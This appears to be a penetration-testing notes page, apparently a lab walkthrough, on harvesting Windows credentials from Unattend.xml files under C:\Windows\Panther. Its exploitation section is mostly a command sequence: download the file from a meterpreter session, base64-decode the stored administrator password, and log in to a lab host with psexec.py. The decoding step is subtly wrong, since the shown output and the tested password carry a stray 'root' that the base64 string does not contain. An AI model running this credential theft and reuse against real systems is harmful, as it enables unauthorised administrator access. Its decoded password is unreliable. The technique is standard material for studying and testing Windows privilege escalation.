Credentials Dumping

Passwords Configuration Files

Windows configuration files can contain stored passwords, e.g. in the Unattended Windows Setup utility, used to mass deploy Windows on systems.

  • The configuration file can contain specific configurations and user account credentials

  • An attacker can find the configuration file left on the target after installation

The utility typically utilizes those files:

C:\Windows\Panther\Unattend.xml

C:\Windows\Panther\Autounattend.xml

  • The stored passwords might be encoded in base64 (easily decodable).

#Exploitation

After getting a meterpreter session or shell session follow the follwing technique:-

  • Manually search for the unattend.xml file, it should be inside

    • C:\\Windows\\Panther

cd C:\\Windows\\Panther
dir
download unattend.xml

  • In a new terminal tab

cat unattend.xml

Get Access

  • administrator user configured base64 password is QWRtaW5AMTIz

    • Save it to a new file

    • Decode it using the base64 tool

nano password.txt
# paste the password, save and exit the file

base64 -d password.txt 
	Admin@123root

  • Test the administrator:Admin@123root credentials with the psexec tool

psexec.py administrator@10.4.19.9

You have gained access to the administrator account

PreviousAccess TokenNextLinux Privilege Escalation

Last updated